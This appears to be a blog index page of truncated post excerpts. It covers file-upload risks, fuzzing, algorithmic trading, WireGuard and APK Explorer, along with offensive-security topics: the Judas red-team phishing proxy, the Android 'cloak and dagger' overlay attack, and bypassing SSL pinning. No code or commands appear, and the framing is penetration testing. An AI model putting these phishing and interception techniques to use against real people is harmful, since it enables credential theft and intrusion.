Apps and websites often need to allow users to upload files for various reasons. Sometimes users need to upload arbitrary files, such as on file bin services like S3, but most of the time, a service is expecting a specific type of file. Your bank might want a photo of your passport for KYC purposes, TikTok expects a video and so on. Unrestricted file uploads create risks for web applications, including complete system takeover, forwarding attacks to back-end systems or client-side attacks. Uploaded files can cause serious problems.
In cases where a service is expecting a specific kind of file…
So you’ve been given a web app to pentest. Maybe it’s a banking app or a document workflow system. Either way, you need to make sure it’s done safely. Modern web applications have a large attack surface, and testing everything by hand is inefficient. That’s where fuzzers come in handy. Fuzzers allow you to generate new inputs based on a seed and pass them to a program. Fuzzing can quickly show areas that are worth further examination.
If you’ve been reading my blog since the start, you’ll remember Judas, the pluggable open-source phishing proxy. I wrote Judas to prove a point on an engagement once, and unfortunately neglected it afterwards. (Side note: Go’s comprehensive standard library makes it easy to toss together a proof of concept on an engagement). I’ve had a lot more time to write code in lockdown so I decided to show Judas some love.
Judas is a reverse proxy for red team phishing engagements based on Go’s httputil.ReverseProxy. …
We’ve all heard about algorithmic trading in the news. It sounds great! You think of a program making money for you while you sip Mai Tais and smoke the finest ganja on the beach in Jamaica. I’m going to show you how you can do it yourself with TD Ameritrade and a laptop.
Before we start, you need to know that great reward comes with great risk. Don’t do this with money you’re not willing to lose.
The first thing you’ll need is a TD Ameritrade account. You don’t need to be a US citizen to get an account, and…
Smartphones have become an extension of our bodies. We use mobile apps for everything from sending money to shooting movies, but for the most part, apps are black boxes. On Android, apps can request information about installed apps and their components from the PackageManager. You can see what an Android app is made of using APK Explorer.
Every Android version comes with Easter Eggs, hidden apps that are interesting to some enthusiasts. APK Explorer makes finding Easter Eggs easy, by displaying them in the list of apps instead of having to search through random tap combinations in the Android UI.
I’ve been experimenting with Wireguard as a VPN to protect my internet traffic from local snoopers and communicate between all my devices as if they were on the same network.
Wireguard was designed with mobile devices in mind. It uses battery-friendly cryptography and the protocol can handle endpoints that change IP address seamlessly. It is ideal for exposing local development servers on my laptop to my iPhone, but deploying configuration to a device is a manual and time-consuming process.
The cloak and dagger attack exploits a combination of drawing over other apps and the high level of access to other apps given to accessibility services on Android. It is a simple yet effective technique being exploited in the wild today by cybercriminals.
The cloak and dagger attack takes advantage of two Android permissions:
SYSTEM_ALERT_WINDOW is used to draw over other Android apps. If an app installed from the Play Store requests this permission in its AndroidManifest.xml file, it will automatically be granted by the system. This forms the first building block of the…
Your target has an Android application and you want to walk through their API to check for server-side vulnerabilities. You configure the emulator to use Burp Suite as a proxy and begin using the app.
Suddenly, the app stops working. Nothing shows in Burp and no HTTPS requests work. The developers have implemented SSL pinning and your phony certificate has been detected. Fortunately, SSL pinning can be disabled if you’re willing to get your hands dirty.
First, you need to decompile the app. Apktool works great for this, and it’s available on all…
Postman is an excellent API testing tool for developers, QA testers and penetration testers. Its UI allows you to easily send HTTP requests and see responses, but it’s also a great automation tool.
In the last post, Judas got SOCKS proxy and SSL support to make the proxy sneakier, but all the proxy can do is dump the requests and responses to the console. What if the red teamer wants to send the requests to a logging REST API? Luckily, Go can help with its plugin standard library package.
To make plugins work, we first need to define a contract for plugins to implement. Plugins may need to do some kind of setup, like reading configuration from command line flags, and they will need to process each HTTP request-response transaction.